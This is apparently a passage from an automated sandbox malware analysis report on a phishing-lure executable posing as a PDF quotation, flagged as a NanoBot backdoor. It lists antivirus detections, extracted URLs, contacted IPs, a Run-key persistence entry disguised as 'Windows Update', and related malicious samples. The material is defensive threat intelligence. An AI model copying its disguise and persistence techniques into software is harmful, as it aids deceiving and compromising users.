              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\WindowsUpdate.exe37%ReversingLabsWin32.Backdoor.NanoBot

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              11.2.WindowsUpdate.exe.ed0000.1.unpack100%AviraHEUR/AGEN.1138127Download File
              3.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
              11.2.WindowsUpdate.exe.1ee40000.4.unpack100%AviraTR/Inject.vcoldiDownload File
              8.2.WindowsUpdate.exe.1c5f0000.4.unpack100%AviraTR/Inject.vcoldiDownload File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.1.unpack100%AviraHEUR/AGEN.1138127Download File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
              0.0.PO 2010029_pdf Quotation from Alibaba Ale.exe.ad0000.0.unpack100%AviraHEUR/AGEN.1138127Download File
              8.2.WindowsUpdate.exe.1ad90000.2.unpack100%AviraTR/AD.MExecute.lzracDownload File
              8.2.WindowsUpdate.exe.1ad90000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
              11.2.WindowsUpdate.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
              11.2.WindowsUpdate.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
              8.2.WindowsUpdate.exe.ed0000.1.unpack100%AviraHEUR/AGEN.1138127Download File
              11.2.WindowsUpdate.exe.1c5f0000.3.unpack100%AviraTR/Inject.vcoldiDownload File
              8.2.WindowsUpdate.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
              8.2.WindowsUpdate.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack100%AviraTR/AD.MExecute.lzracDownload File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1efe0000.6.unpack100%AviraSPR/Tool.MailPassView.473Download File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1c6f0000.4.unpack100%AviraTR/Inject.vcoldiDownload File
              8.0.WindowsUpdate.exe.ed0000.0.unpack100%AviraHEUR/AGEN.1138127Download File
              0.2.PO 2010029_pdf Quotation from Alibaba Ale.exe.1ef40000.5.unpack100%AviraTR/Inject.vcoldiDownload File
              11.2.WindowsUpdate.exe.1eed0000.5.unpack100%AviraTR/AD.MExecute.lzracDownload File
              11.2.WindowsUpdate.exe.1eed0000.5.unpack100%AviraSPR/Tool.MailPassView.473Download File
              11.0.WindowsUpdate.exe.ed0000.0.unpack100%AviraHEUR/AGEN.1138127Download File
              8.2.WindowsUpdate.exe.1ee00000.5.unpack100%AviraTR/Inject.vcoldiDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.carterandcone.com.120%Avira URL Cloudsafe
              http://www.founder.com.cn/cnBm0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.carterandcone.comItaf0%Avira URL Cloudsafe
              http://foo.com/fooT0%Avira URL Cloudsafe
              http://www.carterandcone.comeci0%Avira URL Cloudsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.fontbureau.comceco0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://www.carterandcone.comypo0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.founder.com.cn/cnxmQ0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.fontbureau.comalic0%URL Reputationsafe
              http://www.fontbureau.comalic0%URL Reputationsafe
              http://www.fontbureau.comalic0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.carterandcone.comitk.0%Avira URL Cloudsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.founder.com.cn/cn(0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              whatismyipaddress.com
              		104.16.155.36
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://whatismyipaddress.com/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                    		high
                    http://www.carterandcone.com.12PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.fontbureau.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cnBmPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bThePO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comItafPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://foo.com/fooTWindowsUpdate.exe, 00000008.00000002.308158001.000000001CC12000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312377035.000000001CCB1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers?PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                            		high
                            http://www.carterandcone.comeciPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designersBPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmpfalse
                              		high
                              http://www.tiro.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://whatismyipaddress.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.comcecoPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designersPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmp, PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.228030667.000000001F12D000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://en.wPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222007881.000000001F12D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comypoPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223629764.000000001F138000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.carterandcone.comlPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cThePO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.monotype.PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.227248438.000000001F12F000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnxmQPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://whatismyipaddress.com/-PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/DPleasePO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.ascendercorp.com/typedesigners.htmlPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.224519756.000000001F137000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://login.yahoo.com/config/loginWindowsUpdate.exefalse
                                            		high
                                            http://www.fonts.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comalicPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317281962.000000001F120000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleasePO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.nirsoft.net/WindowsUpdate.exe, 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.zhongyicts.com.cnPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comitk.PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.223535347.000000001F138000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.sakkal.comPO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.317453803.000000001F290000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cn(PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000003.222855521.000000001F152000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.16.155.36
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                Private

                                                IP
                                                192.168.2.1
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:341532
                                                Start date:19.01.2021
                                                Start time:14:06:23
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 40s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:34
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.phis.troj.spyw.evad.winEXE@10/13@1/3
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 11.7% (good quality ratio 10.9%)
                                                • Quality average: 77.3%
                                                • Quality standard deviation: 30%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 134
                                                • Number of non-executed functions: 374
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 2.18.68.82, 51.11.168.160, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.201, 92.122.213.247, 20.54.26.129, 40.88.32.150, 168.61.161.212, 51.104.144.132, 51.104.139.180, 52.254.96.93, 52.251.11.100
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                14:08:16API Interceptor6x Sleep call for process: PO 2010029_pdf Quotation from Alibaba Ale.exe modified
                                                14:08:20API Interceptor1x Sleep call for process: dw20.exe modified
                                                14:08:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                14:08:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                14:08:48API Interceptor1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                104.16.155.36PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                hkaP5RPCGNDVq3Z.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                NDt93WWQwd089H7.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                INQUIRY.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                Prueba de pago.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                6JLHKYvboo.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                jSMd8npgmU.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                RXk6PjNTN8.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                9vdouqRTh3.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                5pB35gGfZ5.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                fyxC4Hgs3s.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                yk94P18VKp.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                oLHQIQAI3N.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                WuGzF7ZJ7P.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                NXmokFkh3R.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                qiGQsdRM57.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/
                                                NSSPH41vE5.exeGet hashmaliciousBrowse
                                                • whatismyipaddress.com/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                whatismyipaddress.comPO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                hkaP5RPCGNDVq3Z.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                B6LNCKjOGt5EmFQ.exeGet hashmaliciousBrowse
                                                • 104.16.154.36
                                                NDt93WWQwd089H7.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                JkhR5oeRHA.exeGet hashmaliciousBrowse
                                                • 66.171.248.178
                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                • 104.16.154.36
                                                INQUIRY.exeGet hashmaliciousBrowse
                                                • 104.16.154.36
                                                Prueba de pago.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                879mgDuqEE.jarGet hashmaliciousBrowse
                                                • 66.171.248.178
                                                remittance1111.jarGet hashmaliciousBrowse
                                                • 66.171.248.178
                                                879mgDuqEE.jarGet hashmaliciousBrowse
                                                • 66.171.248.178
                                                remittance1111.jarGet hashmaliciousBrowse
                                                • 66.171.248.178
                                                https://my-alliances.co.uk/Get hashmaliciousBrowse
                                                • 66.171.248.178
                                                c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                • 104.16.154.36
                                                mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                6JLHKYvboo.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                jSMd8npgmU.exeGet hashmaliciousBrowse
                                                • 104.16.155.36
                                                khJdbt0clZ.exeGet hashmaliciousBrowse
                                                • 104.16.154.36
                                                ZMOKwXqVHO.exeGet hashmaliciousBrowse
                                                • 104.16.154.36

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUSJanuary RFQ..exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SKM_C221200706052800n.exeGet hashmaliciousBrowse
                                                • 66.235.200.146
                                                KuPBIsrqbO.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                RrZ6BOnPCG.exeGet hashmaliciousBrowse
                                                • 104.21.27.226
                                                Fdj5vhj87S.exeGet hashmaliciousBrowse
                                                • 104.16.186.173
                                                INV0009876.exeGet hashmaliciousBrowse
                                                • 104.21.19.200
                                                00000000987772021.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                _MVSEASEAL_RFQ_.xlsxGet hashmaliciousBrowse
                                                • 104.16.186.173
                                                Invoice Payment Details.exeGet hashmaliciousBrowse
                                                • 66.235.200.147
                                                invoice68684881.xlsGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                invoice68684881.xlsGet hashmaliciousBrowse
                                                • 162.159.135.233
                                                RFQ_FOR_PO.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                1_cr.exeGet hashmaliciousBrowse
                                                • 172.67.219.133
                                                PaySlip140121.xlsGet hashmaliciousBrowse
                                                • 162.159.135.233
                                                RFQ (2).exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                1_cr.exeGet hashmaliciousBrowse
                                                • 104.21.45.223
                                                PaySlip140121.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                TT Slip.docGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                n#U00b0761.xlsGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                Shipment ConfirmationPaper - Customer Copy_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.219.133

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_I3UYUDMLOPVYGRAZ_7057fda4f89bb183663b41fd976febdf70a304b_00000000_124dc6e0\Report.wer
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):18018
                                                Entropy (8bit):3.7671072989618524
                                                Encrypted:false
                                                SSDEEP:192:7VE5vnFWMhV203jZIhy9UcJN5X5Q17zvMvkvDKGwNYeh/u7sfS274It0z:RInFNljzqv3vOh/u7sfX4ItI
                                                MD5:5A930DC669FC64A68231E3F0739BF7A2
                                                SHA1:2ADA755AAC4C1AAE4C6154EA8E503A5F1CAF49A5
                                                SHA-256:7CC51741A64901D2FB0BFAC502C42FAD2F109FE005831BACB958E6663483437F
                                                SHA-512:63D374183C0D9F0A68EF7E46ED2D0DD7654C1B014719C3EDF176DB3CA069DD41BB4559A3C5F78A90C84E6113674D8D43C8CB034BC6E4AAEAC333588A9AF3D81D
                                                Malicious:false
                                                Reputation:low
